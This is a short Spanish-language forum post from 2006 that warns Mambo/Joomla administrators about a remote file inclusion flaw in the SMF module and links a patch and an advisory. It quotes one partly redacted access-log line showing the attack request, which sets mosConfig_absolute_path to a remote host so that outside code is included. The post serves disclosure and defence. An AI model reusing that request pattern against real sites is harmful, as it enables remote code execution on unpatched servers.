• Lunes 20 de Septiembre de 2021, 21:30

Autor Tema:  Vulnerabilidad Grave Módulo Smf Para Mambo-joomla  (Leído 1854 veces)

leandrog

  • Moderador
  • ******
  • Mensajes: 153
  • Nacionalidad: ve
    • Ver Perfil
Vulnerabilidad Grave Módulo Smf Para Mambo-joomla
« en: Jueves 20 de Julio de 2006, 18:59 »
0
Vulnerabilidad grave módulo SMF para Mambo - Joomla

Sobre el ataque;

xxxxxx_log

XXX.45.133.X - - [19/Jul/2006:XXXX +0200] “GET /component/option,com_smf/Itemid,63/

components/com_smf/smf.php?mosConfig_absolute_path=

rXXXXXXX.com/components/com_forum/includes/develop? HTTP xxxxxxx “-” “Mozilla/5.0″

Remote File Inclusion

Parche:
http://forum.mamboserver.com/showthread.php?t=83001

Más info:
http://www.frsirt.com/english/advisories/2006/2846

Fuente:
vulneralidad-grave-modulo-smf-para-mambo-joomla
Leandro Gugliotta

ImaginBlog[/url]